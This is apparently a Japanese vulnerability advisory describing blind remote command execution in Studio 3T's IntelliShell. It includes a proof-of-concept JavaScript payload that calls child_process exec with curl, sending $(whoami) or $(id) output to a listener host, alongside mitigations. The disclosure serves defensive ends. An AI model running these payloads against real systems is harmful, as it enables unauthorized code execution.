
Studio 3T v.2025.1.0
ソフトウェア: Studio 3T v.2025.1.0
脆弱性レポート: Studio 3T リモートコマンド実行
概要 Studio 3T バージョン 2025.1.0 以前の重大な脆弱性により、リモートの攻撃者は IntelliShell コンポーネントの child_process モジュールを悪用した細工されたペイロードを介して任意のコードを実行できます。
詳細 脆弱性タイプ: リモートコマンド実行 影響を受ける製品: Studio 3T、バージョン <= 2025.1.0 影響を受けるコンポーネント: IntelliShell 攻撃タイプ: リモート 影響: コード実行: あり サービス拒否: あり 権限昇格: あり
説明 この脆弱性により、リモートの攻撃者は child_process モジュールを利用して、IntelliShell 経由で悪意のある JavaScript ペイロードを送信することで、任意のオペレーティングシステムコマンドを実行できます。これはブラインド実行の脆弱性であり、攻撃者に直接の出力は返されません。 攻撃ベクター
MongoDB インスタンスへの接続を確立します。 child_process モジュールを利用して任意のオペレーティングシステムコマンドを実行する、悪意のある JavaScript ペイロードを IntelliShell 経由で送信します。
概念実証(PoC) 脆弱性を検証するには、次の手順を使用します:
ローカル HTTP サーバーをセットアップします:python3 -m http.server 80
IntelliShell で次の JavaScript ペイロードを実行します: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));
あるいは、以下のコマンドを検証ベクターとして使用します:curl http://site/$(id) 参照
Studio 3T 公式ウェブサイト
Studio 3T GitHub リポジトリ
CWE-78: OSコマンドインジェクション
CWE-94: コードインジェクション
軽減策 ユーザー: パッチ適用済みの Studio 3T バージョン(利用可能な場合)にアップグレードするか、信頼できない MongoDB 接続での IntelliShell の使用を避けてください。 ベンダー: IntelliShell の child_process モジュールへの入力を制限またはサニタイズして、不正なコマンド実行を防止してください。
謝辞 この脆弱性は Kaio Mendonca Pereira によって発見され、報告されました。